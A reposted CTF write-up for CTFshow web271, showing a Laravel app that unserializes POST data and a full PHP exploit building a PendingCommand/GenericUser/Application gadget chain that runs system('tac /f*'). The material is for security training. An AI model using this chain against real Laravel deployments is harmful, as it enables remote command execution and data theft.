CTFshow 反序列化 web271
生活随笔
收集整理的這篇文章主要介紹了
CTFshow 反序列化 web271
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
- 源碼
- 思路
- 題解
- 總結
源碼
<?php/*** Laravel - A PHP Framework For Web Artisans** @package Laravel* @author Taylor Otwell <taylor@laravel.com>*/define('LARAVEL_START', microtime(true));/* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */require __DIR__ . '/../vendor/autoload.php';/* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */$app = require_once __DIR__ . '/../bootstrap/app.php';/* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle($request = Illuminate\Http\Request::capture() ); @unserialize($_POST['data']); highlight_file(__FILE__);$kernel->terminate($request, $response);思路
根據提示Laravel - A PHP Framework For Web Artisans,得知用的是Laravel框架
參考博客:https://www.jianshu.com/p/5aac92a4949f
題解
exp
<?php namespace Illuminate\Foundation\Testing{class PendingCommand{protected $command;protected $parameters;protected $app;public $test;public function __construct($command, $parameters,$class,$app){$this->command = $command;$this->parameters = $parameters;$this->test=$class;$this->app=$app;}} } namespace Illuminate\Auth{class GenericUser{protected $attributes;public function __construct(array $attributes){$this->attributes = $attributes;}} } namespace Illuminate\Foundation{class Application{protected $hasBeenBootstrapped = false;protected $bindings;public function __construct($bind){$this->bindings=$bind;}} } namespace{$genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));$application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")));$pendingcommand = new Illuminate\Foundation\Testing\PendingCommand("system",array('tac /f*'),$genericuser,$application);echo urlencode(serialize($pendingcommand)); } ?>總結
…
總結
以上是生活随笔為你收集整理的CTFshow 反序列化 web271的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow 反序列化 web270
- 下一篇: CTFshow 反序列化 web272